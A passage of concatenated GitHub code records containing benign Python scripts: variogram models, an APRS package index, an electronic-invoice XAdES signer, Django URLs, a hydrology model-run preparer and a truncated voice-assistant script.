= nugget\n self.model = []\n \n def __repr__(self):\n return \"< An abstract Variogram Model>\"\n\n @property\n def f(self):\n return lambda x : self.model(x,self.sill,self.range_a,self.nugget)\n \n\n def corr_f(self,h):\n \"\"\"\n Calculates the correlation function based on the given theoretical \"intrinsic valid model\"\n \n \"\"\"\n ## correlation function for distances bigger than zero\n ## See: Diggle & Ribeiro (2006) section 3.5\n #corr_cont = lambda hx : 1 - (self.sill * self.f(hx) / (self.sill + self.nugget))\n ## Corrections made and suggested by Erick Chacon\n variogram_evaluated = self.f(h)\n corr_cont = (self.sill - variogram_evaluated) / (self.sill - self.nugget)\n #corr_cont = lambda hx : (self.sill - self.f(hx)) / (self.sill - self.nugget)\n #return np.array([1.0 if hx == 0 else corr_cont(hx) for hx in h])\n #corr_cont[corr_cont == 0 ] = 1.0 \n return corr_cont\n\n @property\n def sigma2(self):\n return (self.sill - self.nugget)\n\n @property\n def tau2(self):\n return self.nugget\n\n def calculateCovarianceMatrixWith(self,Mdist):\n \"\"\"\n Returns an evaluation of the Covariance matrix, given a distance matrix.\n Parameters : numpy Matrix\n \"\"\"\n nuggetId = self.nugget * np.identity(Mdist.shape[0])\n s2 = self.sill - self.nugget\n correlMat = np.array(self.corr_f(Mdist.flatten())).reshape(Mdist.shape)\n Sigma = (s2 * correlMat) + nuggetId\n return Sigma\n\n\n\n def fit(self,emp_variogram,init_params=[]):\n \"\"\"\n Fits a the model to an empirical variogram object as base.\n \n Parameters:\n emp_variogram : (Variogram instance)\n parameter_set : a tuple containing the init guesses for the parameters to be fitted from the model\n \n Returns:\n A function with the optimized parameters\n \n \"\"\"\n logger.info(\"Removing possible NA's\")\n envelope = pd.DataFrame({'variogram':emp_variogram.empirical,'lags':emp_variogram.lags})\n envelope = envelope.dropna()\n variogram = envelope.variogram.values\n lags = envelope.lags.values\n from scipy.optimize import curve_fit\n if not init_params:\n init_params = [self.sill,self.range_a,self.nugget]\n if hasattr(self, 'alpha'):\n init_params.append(self.alpha)\n \n try:\n best_params, covar_model = curve_fit(self.model, xdata=lags, ydata=variogram, p0=init_params)\n except TypeError:\n logger.error(\"This model does not support more than 3 parameters\")\n raise\n #return None\n try:\n s,r,n = best_params\n self.sill = s\n self.range_a = r\n self.nugget = n\n except:\n try:\n s,r,n,a = best_params\n self.sill = s\n self.range_a = r\n self.nugget = n\n self.alpha = a\n except:\n raise\n \n logger.info(\"Adding model to the attributes space\")\n\n setattr(self,'model_covar',covar_model)\n \n return {'parameters':best_params,'covar_model':covar_model}\n\n \n## Instances of Variogram \nclass ExponentialVariogram(VariogramModel):\n \"\"\"\n Subclass for exponential Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n super(ExponentialVariogram, self).__init__(sill,range_a,nugget)\n self.model = exponentialVariogram\n self.name = 'exponential'\n def __repr__(self):\n return u\"< Exponential Variogram : sill %s, range %s, nugget %s >\"%(self.sill,self.range_a,self.nugget)\n\nclass GaussianVariogram(VariogramModel):\n \"\"\"\n Subclass for Gaussian Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n super(GaussianVariogram, self).__init__(sill,range_a,nugget)\n self.model = gaussianVariogram\n self.name = 'gaussian'\n def __repr__(self):\n return u\"< Gaussian Variogram : sill %s, range %s, nugget %s >\"%(self.sill,self.range_a,self.nugget)\n\nclass WhittleVariogram(VariogramModel):\n \"\"\"\n Subclass for Gaussian Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0,alpha=1):\n super(WhittleVariogram, self).__init__(sill,range_a,nugget)\n self.model = whittleVariogram\n self.name = 'whittle'\n self.alpha = alpha\n def __repr__(self):\n return u\"< Whittle Variogram : sill %s, range %s, nugget %s, alpha%s >\"%(self.sill,self.range_a,self.nugget,self.alpha)\n\n @property\n def f(self):\n return lambda x : self.model(x,self.sill,self.range_a,self.nugget,self.alpha)\n\n\n\nclass SphericalVariogram(VariogramModel):\n \"\"\"\n Subclass for Spherical Variogram\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n super(SphericalVariogram, self).__init__(sill,range_a,nugget)\n self.model = sphericalVariogram\n self.name = 'spherical'\n def __repr__(self):\n return u\"< Spherical Variogram : sill %s, range %s, nugget %s >\"%(self.sill,self.range_a,self.nugget)\n\n\nclass MaternVariogram(VariogramModel):\n \"\"\"\n Subclass for a Matern Variogram\n \"\"\" \n def __init__(self,sill=0,range_a=0,nugget=0,kappa=0.5):\n super(MaternVariogram, self).__init__(sill,range_a,nugget)\n self.kappa = kappa\n self.model = maternVariogram\n self.name = 'matern'\n def __repr__(self):\n return u\"< Matern Variogram : sill %s, range %s, nugget %s, kappa %s >\"%(self.sill,self.range_a,self.nugget,self.kappa)\n\n @property\n def f(self):\n return lambda x : self.model(x,self.sill,self.range_a,self.nugget,self.kappa)\n \nif __name__ == \"__main__\":\n __package__ = \"spystats\"\n \n\n\n\n\n \n","repo_name":"molgor/spystats","sub_path":"spystats/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":29197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31738485149","text":"import numpy as np\nimport scipy as sp\n\nfrom common import single_em, compute_responsibilities\n\n# find GMM subinterval: max sum subarray of length l\ndef find_subint(arr, l):\n n = len(arr)\n max_sum = -np.inf\n max_left_end = -1\n max_right_end = -1\n for i in range(n-l):\n s = np.sum(arr[i:i+l])\n if s > max_sum:\n max_sum = s\n max_left_end = i\n max_right_end = i + l - 1\n return max_left_end, max_right_end\n\n# returns anomalous indices\ndef find_line(sample):\n mu_est, alpha_est = single_em(sample)\n alpha_n_est = int(alpha_est*n)\n sample_resp = compute_responsibilities(sample, mu_est, alpha_est)\n le, re = find_subint(sample_resp, alpha_n_est)\n return range(le, re+1)","repo_name":"raphael-group/structured-anomalies","sub_path":"src/gmm_line.py","file_name":"gmm_line.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43635558910","text":"from importlib_metadata import version\n\nfrom . import decimaldegrees, geo_util, position, timestamp\nfrom .aprsis import APRSISProtocol, create_aprsis_connection, TCP\nfrom .classes import (\n APRSFrame,\n DataType,\n DataTypeError,\n InformationField,\n ItemReport,\n Message,\n ObjectReport,\n PositionReport,\n StatusReport,\n)\nfrom .constants import (\n APRSIS_HTTP_HEADERS,\n APRSIS_SERVERS,\n APRSIS_FILTER_PORT,\n APRSIS_RX_PORT,\n APRSIS_URL,\n DEFAULT_TOCALL,\n PositionFormat,\n TimestampFormat,\n timestamp_formats_map,\n)\nfrom .data_ext import (\n AreaObject,\n CourseSpeed,\n DataExt,\n DFS,\n PHG,\n RNG,\n)\nfrom .kiss import create_serial_connection, create_tcp_connection, SerialKISS, TCPKISS\nfrom .position import Position\nfrom .timestamp import Timestamp\n\n__author__ = \"Greg Albrecht W2GMD \"\n__copyright__ = \"Copyright 2017 Greg Albrecht and Contributors\"\n__license__ = \"Apache License, Version 2.0\"\n__distribution__ = \"aprs3\"\n__version__ = version(__distribution__)\n__all__ = [\n \"APRSFrame\",\n \"APRSIS_HTTP_HEADERS\",\n \"APRSIS_SERVERS\",\n \"APRSIS_FILTER_PORT\",\n \"APRSIS_RX_PORT\",\n \"APRSIS_URL\",\n \"APRSISProtocol\",\n \"AreaObject\",\n \"CourseSpeed\",\n \"create_aprsis_connection\",\n \"create_serial_connection\",\n \"create_tcp_connection\",\n \"DataExt\",\n \"DataType\",\n \"DataTypeError\",\n \"decimaldegrees\",\n \"DEFAULT_TOCALL\",\n \"DFS\",\n \"geo_util\",\n \"ItemReport\",\n \"InformationField\",\n \"Message\",\n \"ObjectReport\",\n \"PHG\",\n \"position\",\n \"Position\",\n \"PositionFormat\",\n \"PositionReport\",\n \"RNG\",\n \"SerialKISS\",\n \"StatusReport\",\n \"TCP\",\n \"TCPKISS\",\n \"timestamp\",\n \"Timestamp\",\n \"TimestampFormat\",\n \"timestamp_formats_map\",\n \"__author__\",\n \"__copyright__\",\n \"__license__\",\n \"__distribution__\",\n \"__version__\",\n]\n","repo_name":"python-aprs/aprs3","sub_path":"aprs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"32018307020","text":"# =============================================================================\n# Undesirable solution 2\n#\n# Like the Undesirable 1 script, this has user inputs.\n# Also, right triangle sides a and b use the same equations.\n# If I wanted one function to calculate both side and hypotenuse,\n# I would have needed user input the determine which equation to use.\n# Since unit tests seem to be better fit for parameter inputs, I refactored.\n# =============================================================================\n\n\ndef calc_pythagorean_theorem(side, length_first, length_second):\n \"\"\"Calculate the Pythagorean theorem\n Results are printed to console, and also passed back as a float type\"\"\"\n\n print(\"\\nCalculate triangle side lengths with the Pythagorean theorem\")\n \n \n while True:\n try:\n side = input(\"To solve for Hypotenuse, enter 'c'. Otherwise, choose 'a' or 'b': \")\n assert side in ['a', 'b', 'c']\n \n except AssertionError:\n print(\"Must choose 'a', 'b' or 'c'\")\n else:\n break \n\n\n if side == 'a':\n \n while True:\n try:\n b = float(input(\"Enter the length of side b: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break\n\n while True:\n try:\n c = float(input(\"Enter the length of hypotenuse c: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break \n\n a = ((c * c) - (b * b)) ** (1.0 / 2.0)\n\n if isinstance(a, complex):\n print(\"Your return is complex. Ensure values are meet Pythagorean requirements\")\n \n print(\"\\nThe length of \" + side + \" is \" + str(complex(a)))\n \n return a\n \n elif side == 'b': \n while True:\n try:\n a = float(input(\"Enter the length of side a: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break\n\n while True:\n try:\n c = float(input(\"Enter the length of hypotenuse c: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break \n\n b = ((c * c) - (a * a)) ** (1.0 / 2.0)\n\n if isinstance(b, complex):\n print(\"Your return is complex. Ensure values are meet Pythagorean requirements\")\n\n print(\"\\nThe length of \" + side + \" is \" + str(round(b, 3)))\n\n return b\n \n elif side == 'c':\n \n while True:\n try:\n a = float(input(\"Enter the length of side a: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break\n\n while True:\n try:\n b = float(input(\"Enter the length of hypotenuse b: \"))\n except ValueError:\n print(\"Numeric only!\")\n continue\n break \n\n c = ((a * a) + (b * b)) ** (1.0 / 2.0)\n\n if isinstance(c, complex):\n print(\"Your return is complex. Ensure values are meet Pythagorean requirements\")\n\n print(\"\\nThe length of \" + side + \" is \" + str(round(c, 3)))\n \n return c\n\n \nresult = calc_pythagorean_theorem()","repo_name":"garthmortensen/programs","sub_path":"testing/numeric/math_stuff_undesirable_2.py","file_name":"math_stuff_undesirable_2.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14885548977","text":"import sys\n\nfilename = sys.argv[0]\narguments = sys.argv[1:]\n\nfood = arguments[0]\nquantity = int(arguments[1])\ncost = float(arguments[2])\n\nprint(\"You are buying {} {} for ${}\".format(quantity, food, quantity * cost))\n","repo_name":"RealKevinApetrei/MTA-Python-Course-Work","sub_path":"Part 1/Introduction to Python (2)/command_line.py","file_name":"command_line.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"7747383805","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom lxml import etree\nimport xmlsig\nfrom xades import ObjectIdentifier, XAdESContext, template, utils\nfrom xades.policy import GenericPolicyId\nfrom cryptography.hazmat.primitives.serialization import pkcs12 # No quitar, si se usa !!!\n\n#------------------------------------------------------------------------\nfrom xades.constants import MAP_HASHLIB\nfrom xades.policy import ETSI, DS\nfrom xmlsig.utils import get_rdns_name\nfrom base64 import b64encode\n\nclass MiGenericPolicyId(GenericPolicyId):\n \"\"\"\n Sobreesctito para cambiar: 'self.hash_method' por 'xmlsig.constants.TransformSha512'\n \"\"\"\n def calculate_certificate(self, node, key_x509):\n fingerprint = key_x509.fingerprint(MAP_HASHLIB[xmlsig.constants.TransformSha512]())\n _ETSI_Cert = ETSI.Cert(\n ETSI.CertDigest(\n DS.DigestMethod(Algorithm=xmlsig.constants.TransformSha512),\n DS.DigestValue(b64encode(fingerprint).decode()),\n ),\n ETSI.IssuerSerial(\n DS.X509IssuerName(get_rdns_name(key_x509.issuer.rdns)),\n DS.X509SerialNumber(str(key_x509.serial_number)),\n ),\n )\n node.append(_ETSI_Cert)\n\n#------------------------------------------------------------------------\nimport OpenSSL\nfrom cryptography.x509 import Certificate\nclass MiXAdESContext(XAdESContext):\n \"\"\"\n Sobreesctito para añadir los 'ca_certificates'\n \"\"\"\n def load_pkcs12(self, key):\n if isinstance(key, OpenSSL.crypto.PKCS12):\n # This would happen if we are using pyOpenSSL\n self.x509 = key.get_certificate().to_cryptography()\n self.public_key = key.get_certificate().to_cryptography().public_key()\n self.private_key = key.get_privatekey().to_cryptography_key()\n self.ca_certificates = key.get_ca_certificates()\n elif isinstance(key, pkcs12.PKCS12KeyAndCertificates):\n # This would happen if we are using cryptography\n # cuando se lee con load_pkcs12\n self.x509 = key.cert.certificate\n self.public_key = key.cert.certificate.public_key()\n self.private_key = key.key\n for cer in key.additional_certs:\n self.ca_certificates.append(cer.certificate)\n elif isinstance(key, tuple):\n # This would happen if we are using cryptography\n # cuando se lee con load_key_and_certificates\n self.x509 = key[1]\n self.public_key = key[1].public_key()\n self.private_key = key[0]\n # Parche para obtener ca_certificates\n if len(key) > 2 and isinstance(key[2], list):\n for cer in key[2]:\n if isinstance(cer, Certificate):\n self.ca_certificates.append(cer)\n else:\n raise NotImplementedError()\n\n#------------------------------------------------------------------------\nfrom xmlsig.utils import create_node\nfrom xades.ns import EtsiNS\nclass MiObjectIdentifier(ObjectIdentifier):\n\n def to_xml(self, node):\n \"\"\"\n Sobreescrito para añadir el atributo: 'Qualifier=\"OIDAsURN\"'\n \"\"\"\n n = create_node('Identifier', node, EtsiNS, text=self.identifier)\n n.set('Qualifier', 'OIDAsURN')\n if self.description is not None:\n create_node('Description', node, EtsiNS).text = self.description\n if len(self.references) > 0:\n documentation = create_node('DocumentationReferences', node, EtsiNS)\n for reference in self.references:\n create_node(\n 'DocumentationReference', documentation, EtsiNS\n ).text = reference\n\n#------------------------------------------------------------------------\n\n\ndef firma(certificado, origen, verify=True):\n root = etree.parse(origen).getroot()\n\n signature_id = utils.get_unique_id()\n reference_id = utils.get_unique_id()\n\n signature = xmlsig.template.create(\n xmlsig.constants.TransformInclC14N,\n xmlsig.constants.TransformRsaSha512,\n f'Signature-{signature_id}-Signature',\n )\n ref = xmlsig.template.add_reference(\n signature,\n xmlsig.constants.TransformSha512,\n uri='',\n name=f'Reference-{reference_id}'\n )\n xmlsig.template.add_transform(ref, xmlsig.constants.TransformEnveloped)\n\n xmlsig.template.add_reference(\n signature,\n xmlsig.constants.TransformSha512,\n uri=f'#Signature-{signature_id}-SignedProperties',\n uri_type='http://uri.etsi.org/01903#SignedProperties'\n )\n xmlsig.template.add_reference(\n signature, xmlsig.constants.TransformSha512,\n uri=f'#Signature-{signature_id}-KeyInfo'\n )\n ki = xmlsig.template.ensure_key_info(\n signature,\n name=f'Signature-{signature_id}-KeyInfo'\n )\n data = xmlsig.template.add_x509_data(ki)\n xmlsig.template.x509_data_add_certificate(data)\n xmlsig.template.add_key_value(ki)\n\n qualifying = template.create_qualifying_properties(\n signature,\n etsi='xades',\n name=f'Signature-{signature_id}-QualifyingProperties'\n )\n #utils.ensure_id(qualifying)\n\n props = template.create_signed_properties(\n qualifying,\n datetime=datetime.now(),\n name=f'Signature-{signature_id}-SignedProperties'\n )\n template.add_claimed_role(props, 'emisor')\n signed_do = template.ensure_signed_data_object_properties(props)\n template.add_data_object_format(\n signed_do,\n reference=f'#Reference-{reference_id}',\n identifier=MiObjectIdentifier('urn:oid:1.2.840.10003.5.109.10', ''),\n mime_type='text/xml',\n encoding='',\n description=''\n )\n\n root.append(signature)\n\n policy = MiGenericPolicyId(\n 'https://www.facturae.gob.es/politica_de_firma_formato_facturae/'\n 'politica_de_firma_formato_facturae_v3_1.pdf',\n 'Politica de Firma FacturaE v3.1',\n xmlsig.constants.TransformSha1,\n )\n\n ctx = MiXAdESContext(policy)\n ctx.load_pkcs12(certificado)\n ctx.sign(signature)\n if verify:\n ctx.verify(signature)\n\n return etree.tostring(root, encoding='UTF-8', xml_declaration=True, standalone=False)\n\n\nif __name__ == '__main__':\n import sys\n import os\n import argparse\n from io import StringIO, BytesIO\n from cryptography.hazmat.primitives.serialization import pkcs12\n import codecs\n\n __version__ = '0.0.1'\n\n parser = argparse.ArgumentParser(description='Firma XML Facturae v3.2.x XAdES (Por Juhegue)')\n parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)\n parser.add_argument('-o', '--origen', dest='origen', type=str, help='XML origen', required=True)\n parser.add_argument('-c', '--certificado', dest='certificado', type=str, help='Certidicado pkcs12', required=True)\n parser.add_argument('-p', '--clave', dest='clave', type=str, help='Clave certificado', required=True)\n parser.add_argument('-x', '--validar', dest='validar', type=str, help='Validar version', required=False,\n choices=['3.2', '3.2.1', '3.2.2', 'null'], default='3.2')\n args = parser.parse_args()\n\n class FirmaError(Exception):\n ...\n\n try:\n try:\n with open(args.certificado, 'rb') as f:\n data = f.read()\n # certificado = OpenSSL.crypto.load_pkcs12(data, args.clave.encode())\n # certificado = pkcs12.load_pkcs12(data, args.clave.encode())\n certificado = pkcs12.load_key_and_certificates(data, args.clave.encode())\n except Exception as e:\n raise FirmaError(f'ERROR certificado [{e.__class__.__name__}]. {e}')\n\n try:\n root = etree.parse(args.origen)\n xml = etree.tostring(root, encoding='UTF-8', xml_declaration=False).decode('utf8')\n except Exception as e:\n raise FirmaError(f'ERROR XML [{e.__class__.__name__}]. {e}')\n \n try:\n verify = False if args.validar == 'null' else True\n xsig = firma(certificado, StringIO(xml), verify).decode()\n except Exception as e:\n raise FirmaError(f'ERROR Firma [{e.__class__.__name__}]. {e}')\n\n if args.validar != 'null':\n try:\n version = args.validar.replace('.', '_')\n path = os.path.join(os.path.dirname(__file__))\n xsd = os.path.join(path, 'data', f'Facturaev{version}.xml')\n with codecs.open(xsd, 'r', 'utf-8') as f:\n xsd_data = f.read()\n xsd_shema = os.path.join(path, 'data', 'xmldsig-core-schema.xsd')\n xsd_shema = 'file:///' + xsd_shema.replace('\\\\', '/')\n xsd_data = xsd_data.replace('http://www.w3.org/TR/xmldsig-core/xmldsig-core-schema.xsd', xsd_shema)\n xsd_tree = etree.fromstring(xsd_data)\n xml_tree = etree.parse(BytesIO(xsig.encode('utf-8')))\n schema = etree.XMLSchema(xsd_tree)\n schema.assertValid(xml_tree)\n except etree.DocumentInvalid:\n errors = list()\n for error in schema.error_log:\n errors.append(f'(Line {error.line}) {error.message}')\n err = '. '.join(errors)\n raise FirmaError(f'ERROR al validar: {err}')\n\n except Exception as e:\n raise FirmaError(f'ERROR validar [{e.__class__.__name__}]. {e}')\n\n pathname, _ = os.path.splitext(args.origen)\n try:\n with codecs.open(f'{pathname}.xsig', 'w', 'utf-8') as f:\n f.write(xsig)\n except Exception as e:\n raise FirmaError(f'ERROR grabar [{e.__class__.__name__}]. {e}')\n\n except FirmaError as e:\n print(e)\n sys.exit(1)\n","repo_name":"juhegue/firmafe","sub_path":"firmafe.py","file_name":"firmafe.py","file_ext":"py","file_size_in_byte":9871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1119215668","text":"from django.contrib import admin\nfrom django.urls import path\nfrom app import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',views.user_login,name = 'login'),\n path('logout',views.logoutuser,name = 'logout'),\n path('index/', views.index, name='index'),\n path('add/', views.add, name='add'),\n path('update//', views.update, name='update_data'),\n path('updatenew//', views.update_new, name='update_new'),\n path('delete//', views.deletedata, name='delete_data'),\n path('register/', views.registerPage,name ='register')\n]","repo_name":"rohit7630/studentdata","sub_path":"studentdata/studentdata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72397976107","text":"import sys\nimport datetime\nimport os\nimport shutil\n# Linux command for utc YYYYMMDDHHmm: date -u +%Y%m%d%H%m\n\ndatetime_format_str = \"%Y%m%d%H\"\nforecast_timestep_size_tdelta = datetime.timedelta(hours=1)\nmodel_run_output_timespan_tdelta = datetime.timedelta(days=7, hours=6)\nmodel_run_interval_tdelta = datetime.timedelta(hours=12)\n\nlsm_source_path = \"/home/sherry/Downloads/COSMO/drew_test/all_in_one\"\ntemplate_path = \"/home/sherry/Downloads/COSMO/drew_test/\"\ntarget_path = \"/home/sherry/Downloads/COSMO/drew_test/run\"\n\n\ndef _create_folder(path):\n if not os.path.exists(path):\n os.makedirs(path)\n else:\n print(\"Folder already exists at {}\".format(path))\n\n\ndef _copy_lsm(lsm_source_path, target_path, model_dt, symlink=False):\n print(\"Copying LSM....\")\n fn_format = \"PLATANC_{model_dt}_{forecast_dt}.nc\"\n\n end_frst_dt = model_dt + model_run_output_timespan_tdelta - forecast_timestep_size_tdelta\n current_frst_dt = model_dt - forecast_timestep_size_tdelta\n while current_frst_dt <= end_frst_dt:\n current_frst_dt += forecast_timestep_size_tdelta\n current_frst_fn = fn_format.format(model_dt=model_dt.strftime(datetime_format_str), forecast_dt=current_frst_dt.strftime(datetime_format_str))\n\n source_file_path = os.path.join(lsm_source_path, current_frst_fn)\n target_file_path = os.path.join(target_path, current_frst_fn)\n\n # if symlink:\n # if not (os.path.islink(target_file_path) and os.path.getsize(source_file_path) == os.path.getsize(target_file_path)):\n # os.symlink(source_file_path, target_file_path)\n # else:\n if not(os.path.isfile(target_file_path) and os.path.getsize(source_file_path) == os.path.getsize(target_file_path)):\n shutil.copyfile(source_file_path, target_file_path)\n print(\"Copying to {}\".format(target_file_path))\n else:\n print(\"File already exists at {}\".format(target_file_path))\n\n\ndef _find_closest_model_run_dt(dt, search_future=False):\n input_dt = dt\n utc00 = datetime.datetime(year=input_dt.year, month=input_dt.month, day=input_dt.day, hour=0)\n utc12 = datetime.datetime(year=input_dt.year, month=input_dt.month, day=input_dt.day, hour=12)\n if search_future:\n if input_dt > utc12:\n return utc12 + model_run_interval_tdelta\n elif input_dt > utc00:\n return utc12\n else:\n return utc00\n else:\n if input_dt >= utc12:\n return utc12\n else:\n return utc00\n\n\ndef _build_dt_list(model_run_first_dt, model_run_last_dt, interval=model_run_interval_tdelta):\n model_run_dt_list = [model_run_first_dt]\n while model_run_dt_list[-1] < model_run_last_dt:\n model_run_dt_list.append(model_run_dt_list[-1]+model_run_interval_tdelta)\n model_run_dt_list.sort()\n return model_run_dt_list\n\n\ndef prepare_model_run(model_run_start_dt, model_run_end_dt=None):\n\n model_run_dt_list = []\n if model_run_end_dt:\n model_run_first_dt = _find_closest_model_run_dt(model_run_start_dt, search_future=True)\n model_run_last_dt = _find_closest_model_run_dt(model_run_end_dt)\n model_run_dt_list = _build_dt_list(model_run_first_dt, model_run_last_dt)\n else:\n model_run_dt_list=[_find_closest_model_run_dt(model_run_start_dt)]\n\n print(\"Preparing {} runs: {}\".format(len(model_run_dt_list), model_run_dt_list))\n\n for i in range(len(model_run_dt_list)):\n model_run_dt = model_run_dt_list[i]\n print(\"Preparing Run No{}: {}\".format(i, model_run_dt))\n if i == 0:\n previous_model_run_dt = None\n else:\n previous_model_run_dt = model_run_dt_list[i-1]\n\n # create a parent folder for this run YYYYMMDDHH\n run_folder_name = model_run_dt.strftime(datetime_format_str)\n run_folder_path = os.path.join(target_path, run_folder_name)\n _create_folder(run_folder_path)\n # create \"data\" folder\n data_folder_path = os.path.join(run_folder_path, \"data\")\n _create_folder(data_folder_path)\n # create lsm folder\n lsm_folder_name = run_folder_name\n lsm_folder_path = os.path.join(data_folder_path, lsm_folder_name)\n _create_folder(lsm_folder_path)\n # copy lsm\n _copy_lsm(lsm_source_path, lsm_folder_path, model_run_dt)\n\n # copy input folder\n input_source_path = os.path.join(template_path, \"input\")\n input_folder_path = os.path.join(run_folder_path, \"input\")\n if os.path.isdir(input_folder_path):\n import uuid\n os.rename(input_folder_path, input_folder_path + \"_\" + str(uuid.uuid4())[:6])\n shutil.copytree(input_source_path, input_folder_path)\n\n return model_run_dt_list\n\n\ndef main():\n #current_utc_dt_str = sys.argv[1]\n #print (current_utc_dt_str)\n #current_utc_dt = datetime.datetime.strptime(current_utc_dt_str, \"%Y%m%d%H%M\")\n\n #start_utc_dt = datetime.datetime.utcnow()\n #end_utc_dt = None\n\n start_utc_dt = datetime.datetime(year=2018, month=8, day=8, hour=0)\n end_utc_dt = datetime.datetime(year=2018, month=8, day=9, hour=0)\n\n model_run_dt_list = prepare_model_run(start_utc_dt, end_utc_dt)\n\n from RAPIDpy.inflow import run_lsm_rapid_process\n\n for model_run_dt in model_run_dt_list:\n\n model_run_dt_str = model_run_dt.strftime(\"%Y%m%d%H\")\n model_run_root = os.path.join(target_path, model_run_dt_str)\n previous_model_run_dt = model_run_dt - datetime.timedelta(hours=12)\n\n previous_model_run_dt_str = previous_model_run_dt.strftime(\"%Y%m%d%H\")\n previous_model_run_root = os.path.join(target_path, previous_model_run_dt_str)\n\n # Run Cosmo\n run_lsm_rapid_process(\n rapid_executable_location='/home/sherry/rapid/run/rapid',\n rapid_io_files_location=model_run_root,\n lsm_data_location=os.path.join(model_run_root, \"data\", model_run_dt_str),\n use_all_processors=False, # defaults to use all processors available\n num_processors=1, # you can change this number if use_all_processors=False\n generate_initialization_file=True,\n timedelta_between_simulations=datetime.timedelta(hours=12),\n initial_flows_file=os.path.join(previous_model_run_root, \"qinit.csv\"),\n # path to folder with LSM data\n # simulation_start_datetime=datetime(1980, 1, 1),\n # simulation_end_datetime=datetime(2017, 1, 1),\n # file_datetime_re_pattern = r'\\d{12}',\n # file_datetime_pattern = \"%Y%m%d%H%M\",\n # file_datetime_re_pattern = r'\\d{6}',\n # file_datetime_pattern = \"%Y%m\",\n # expected_time_step = \"86400\",\n # convert_one_hour_to_three=False\n )\n\n\n pass\n\n\nif __name__ == \"__main__\":\n\n main()\n\n","repo_name":"xhqiao89/run_rapidpy","sub_path":"run_cosmo_docker.py","file_name":"run_cosmo_docker.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35658936786","text":"import pyttsx3\nimport speech_recognition as sr\nimport datetime\nimport wikipedia\nimport webbrowser\nimport os\nimport smtplib\nfrom googlesearch import search\nimport google\n\n\n# Put your Chrome application's path here\nchrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'\n\n# initializing the voice engine\nengine = pyttsx3.init('sapi5')\nvoices = engine.getProperty('voices')\n\n# setting the voice\nengine.setProperty('voice', voices[len(voices)-2].id)\n\n\n# takes a string and pronounce it\ndef speak(audio):\n\n engine.say(audio)\n engine.runAndWait()\n\n\ndef greetMe():\n currentH = int(datetime.datetime.now().hour)\n if currentH >= 0 and currentH < 12:\n speak('good morning,sir!')\n\n if currentH >= 12 and currentH < 18:\n speak('good afternoon,Sir!')\n\n if currentH >= 18 and currentH != 0:\n speak('good evening,Sir!')\n\n speak(\" I am your assistant , how may I help you?\")\n\n# Take your voice command\n\n\ndef takeCommand():\n r = sr.Recognizer()\n\n # put your microphone's index as the argument to sr.Microphone function.\n # You can get indexes of connected microphones by running audio.py file\n with sr.Microphone(1) as source:\n print(\"Listening...\")\n # 0.6 sec pause in your voice will breake the listening process and it will start recognizing\n r.pause_threshold = 0.6\n audio = r.listen(source)\n try:\n print(\"recognizing...\")\n # Google speech recognizer\n query = r.recognize_google(audio, language='en-in')\n print('User said : ' + query + '\\n')\n\n except sr.UnknownValueError:\n speak('Sorry sir! I didn\\'t get that! Try typing the command!')\n query = str(input('Command: '))\n\n return query\n\n\ngreetMe()\n\nwhile True:\n\n query = takeCommand().lower()\n\n# Implemeted function to do various tasks.\n\n if 'wikipedia' in query:\n speak('searching wikipedia...')\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=1)\n print(results)\n speak(results)\n\n elif 'open youtube' in query:\n speak(\"opening youtube\")\n webbrowser.open(\"youtube.com\")\n\n elif 'open google' in query:\n speak(\"opening google\")\n webbrowser.open(\"google.com\")\n\n elif 'open pictures' in query:\n\n pictures = 'C:\\\\Users\\\\2019c\\\\Pictures' # Your picture directory here\n\n action = os.listdir(pictures)\n os.open(action[0])\n\n elif 'play' in query:\n\n music_dir = \"D:\\\\SONGS\" # Put your song directory's address here\n songs = os.listdir(music_dir)\n query = query.replace(\"play \", \"\")\n n = len(songs)\n for i in range(n):\n\n if query in songs[i].lower():\n print(songs[i])\n speak(\"Playing\" + query)\n os.startfile(os.path.join(music_dir, songs[i]))\n break\n\n elif 'the time' in query:\n strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")\n speak(f\" sir, The time is {strtime}\")\n\n elif 'open pycharm' in query:\n speak(\"opening pycharm\")\n pypath = \"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2019.2.3\\\\bin\\\\pycharm64.exe\"\n os.startfile(pypath)\n\n # you can open any application by giving its path to os.startfile function\n\n elif 'what is your name' in query:\n\n speak(\"no need to know my name, I am your assistant and my work is to obey you!\")\n\n elif 'who are you' in query:\n speak(\"I am your assistant, how can you forget me?\")\n\n elif 'hello' in query:\n 